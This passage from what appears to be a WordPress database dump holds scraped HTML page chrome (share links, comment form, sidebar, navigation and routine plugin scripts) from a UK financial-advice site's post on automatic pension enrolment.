<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=What+is+Automatic+Enrolment%20http://www.equalitywalk.org.uk/automatic-enrolment/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/automatic-enrolment/&amp;title=What%20is%20Automatic%20Enrolment\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/automatic-enrolment/&amp;title=What%20is%20Automatic%20Enrolment\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fautomatic-enrolment%2F&amp;name=What+is+Automatic+Enrolment&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/automatic-enrolment/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fautomatic-enrolment%2F&amp;description=What+is+Automatic+Enrolment&amp;media=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=What is Automatic Enrolment&amp;body=http://www.equalitywalk.org.uk/automatic-enrolment/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../automatic-enrolment/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8772\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"4db0ac52ce\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"217\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;	What is Automatic Enrolment','Read about','publish','closed','closed','','what-is-automatic-enrolment','','','2017-09-21 17:37:01','2017-09-21 17:37:01','',0,'http://www.equalitywalk.org.uk/what-is-automatic-enrolment',0,'post','',0),(53,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"single single-post postid-7585 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR-Logo.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Stakeholder Pensions</a></li>&#13;\n		<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Occupational Pensions</a></li>&#13;\n		<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">More Information&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 